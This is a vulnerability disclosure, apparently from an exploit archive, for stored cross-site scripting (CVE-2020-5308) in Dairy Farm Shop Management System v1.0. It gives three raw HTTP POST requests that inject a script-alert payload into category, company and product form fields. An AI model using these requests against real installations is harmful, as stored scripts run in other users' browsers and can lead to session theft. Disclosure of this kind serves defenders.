# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting  
# Google Dork: N/A  
# Date: 2020-01-03  
# Exploit Author: Chris Inzinga  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/  
# Version: v1.0  
# Tested on: Windows  
# CVE: CVE-2020-5308  
  
================ 1. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-category.php  
Method: POST  
Parameters: 'category' and 'categorycode' (both receive the same payload in the request below)
Payload: <script>alert(1)</script> (sent URL-encoded in the form body)
Note: every request in this advisory carries a PHPSESSID cookie, i.e. it was sent from an existing PHP session; the advisory does not state whether the add-* pages require a logged-in user, so reproduce with a valid session, and note that the page on which the stored value is later rendered is not identified here.
  
POST /dfsms/add-category.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-category.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 2. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-company.php  
Method: POST  
Parameter: 'companyname'
Payload: <script>alert(1)</script> (sent URL-encoded in the form body)
  
POST /dfsms/add-company.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-company.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 59  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=  
  
  
  
================ 3. - Cross Site Scripting (Persistent) ================  
  
URL: http://192.168.0.33/dfsms/add-product.php  
Method: POST  
Parameter: 'productname' (the other form fields 'category', 'company' and 'productprice' are sent with benign values)
Payload: <script>alert(1)</script> (sent URL-encoded in the form body)
  
POST /dfsms/add-product.php HTTP/1.1  
Host: 192.168.0.33  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.0.33/dfsms/add-product.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 101  
Connection: close  
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg  
Upgrade-Insecure-Requests: 1  
  
category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=